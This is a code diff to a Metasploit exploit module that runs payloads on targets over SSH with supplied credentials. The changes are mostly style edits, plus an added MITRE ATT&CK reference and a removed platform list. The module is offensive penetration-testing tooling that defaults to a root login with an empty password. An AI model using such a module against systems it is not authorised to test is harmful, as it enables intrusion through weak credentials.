@@ -14,14 +14,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def initialize
     super(
       'Name' => 'SSH User Code Execution',
-      'Description' => %q(
+      'Description' => %q{
         This module connects to the target system and executes the necessary
         commands to run the specified payload via SSH. If a native payload is
         specified, an appropriate stager will be used.
-      ),
+      },
       'Author' => ['Spencer McIntyre', 'Brandon Knight'],
       'References' => [
-        [ 'CVE', '1999-0502'] # Weak password
+        [ 'CVE', '1999-0502'], # Weak password
+        [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
       ],
       'License' => MSF_LICENSE,
       'Privileged' => true,
@@ -31,10 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'Payload' => {
         'Space' => 800000,
-        'BadChars' => "",
+        'BadChars' => '',
         'DisableNops' => true
       },
-      'Platform' => %w[linux osx unix python bsd],
       'CmdStagerFlavor' => %w[bourne echo printf wget],
       'Targets' => [
         [
@@ -143,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
             },
             'Payload' => {
               'Compat' => {
-                'PayloadType' => 'ssh_interact',
+                'PayloadType' => 'ssh_interact'
               }
             }
           }
@@ -155,14 +155,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'Notes' => {
         'Stability' => [ CRASH_SAFE, ],
         'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
-        'Reliability' => [ REPEATABLE_SESSION, ],
+        'Reliability' => [ REPEATABLE_SESSION, ]
       },
     )
 
     register_options(
       [
-        OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
-        OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
+        OptString.new('USERNAME', [ true, 'The user to authenticate as.', 'root' ]),
+        OptString.new('PASSWORD', [ true, 'The password to authenticate with.', '' ]),
         Opt::RHOST(),
         Opt::RPORT(22)
       ]
@@ -175,7 +175,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def execute_command(cmd, opts = {})
+  def execute_command(cmd, _opts = {})
     vprint_status("Executing #{cmd}")
     begin
       Timeout.timeout(3.5) { ssh_socket.exec!(cmd) }
